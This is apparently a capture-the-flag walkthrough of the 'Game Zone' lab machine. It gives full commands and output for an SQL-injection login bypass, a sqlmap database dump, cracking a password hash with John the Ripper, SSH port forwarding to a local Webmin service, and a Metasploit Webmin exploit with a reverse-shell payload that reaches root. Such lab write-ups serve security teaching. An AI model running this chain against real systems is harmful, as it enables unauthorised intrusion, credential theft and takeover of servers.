Game Zone

Learn to hack into this machine. Understand how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges to root!

Scanning

nmap

root@ip-10-10-202-12:~# nmap -T4 -A 10.10.42.26

Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-22 13:48 BST
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.00% done; ETC: 13:50 (0:01:39 remaining)
Nmap scan report for ip-10-10-42-26.eu-west-1.compute.internal (10.10.42.26)
Host is up (0.00057s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
|   256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
|_  256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Game Zone
MAC Address: 02:AE:D8:BA:8A:FD (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.57 ms ip-10-10-42-26.eu-west-1.compute.internal (10.10.42.26)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.96 seconds

Enumeration

port 80

login page ... lets go for SQLi

Initial Access

SQLi

Use ' or 1=1 -- - as your username and leave the password blank.

We in let's search for '

this form infected with SQLi lets break into database using SQLmap

backend running mysql

SQLMap

lets capture this request with burpsuite first

save it to text file

root@ip-10-10-202-12:~# cat req.txt 
Host: 10.10.42.26
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://10.10.42.26
Connection: close
Referer: http://10.10.42.26/portal.php
Cookie: PHPSESSID=lkupl1irpcikelbq03vroe3ii5
Upgrade-Insecure-Requests: 1

searchitem=test" > req.txt

# sqlmap -r req.txt --dbms=mysql --dump
# -r request
# --dbms tells SQLMap what type of database management system it is
# --dump attempts to outputs the entire database

root@ip-10-10-202-12:~# sqlmap -r req.txt --dbms=mysql --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.2.4#stable}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
. . .
[SNIP]
. . .
+------------------------------------------------------------------+----------+
| pwd                                                              | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47  |
+------------------------------------------------------------------+----------+

lets crack this one and connect using SSH

using john the ripper to crack this hash

root@ip-10-10-202-12:~# john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 256/256 AVX2 8x])
Warning: poor OpenMP scalability for this hash type, consider --fork=2
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124    (?)
1g 0:00:00:00 DONE (2021-09-22 14:13) 3.333g/s 9721Kp/s 9721Kc/s 9721KC/s vimivera..veluasan
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed. 

credentials agent47:videogamer124

SSH target with this credentials ...

• User Shell

Privilege Escalation

Enumerate Services

0.0.0.0 not routable accessed locally only

let's setup reverse ssh tunneling

root@ip-10-10-202-12:~# ssh -L 10000:localhost:10000 agent47@10.10.42.26
agent47@10.10.42.26's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

109 packages can be updated.
68 updates are security updates.


Last login: Wed Sep 22 08:16:05 2021 from 10.10.202.12
agent47@gamezone:~$ 

now we can access port 10000 on attacker machine

login with credentials agent47:videogamer124

root@ip-10-10-202-12:~# nmap -sV -p 10000 127.0.0.1

Starting Nmap 7.60 ( https://nmap.org ) at 2021-09-22 15:34 BST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000044s latency).

PORT      STATE SERVICE VERSION
10000/tcp open  http    MiniServ 1.580 (Webmin httpd)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.62 seconds

version MiniServ 1.580

Metasploit

$ msfconsole -q
msf5 > search CVE-2012-2982

Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/unix/webapp/webmin_show_cgi_exec  2012-09-06       excellent  Yes    Webmin /file/show.cgi Remote Command Execution

Let’s select it and set a reverse shell for our payload:

msf5 > use 0
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > show options

Module options (exploit/unix/webapp/webmin_show_cgi_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       Webmin Password
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     10000            yes       The target port (TCP)
   SSL       true             yes       Use SSL
   USERNAME                   yes       Webmin Username
   VHOST                      no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Webmin 1.580

Now, let’s set up our variables:

msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set rpot 10000
rpot => 10000
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set username agent47
username => agent47
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set password videogamer124
password => videogamer124
msf5 exploit(unix/webapp/webmin_show_cgi_exec) > set lhost 10.8.50.72
lhost => 10.8.50.72

We are all set. Let’s exploit.

msf5 exploit(unix/webapp/webmin_show_cgi_exec) > exploit 

[*] Started reverse TCP double handler on 10.8.50.72:4444 
[*] Attempting to login...
[+] Authentication successfully
[+] Authentication successfully
[*] Attempting to execute the payload...
[+] Payload executed successfully
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo wwkNQ0H13ZRfhiYE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "wwkNQ0H13ZRfhiYE\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.8.50.72:4444 -> 10.10.60.68:32784) at 2020-06-08 19:59:09 +0200


pwd
/usr/share/webmin/file/
whoami
root

• Root Shell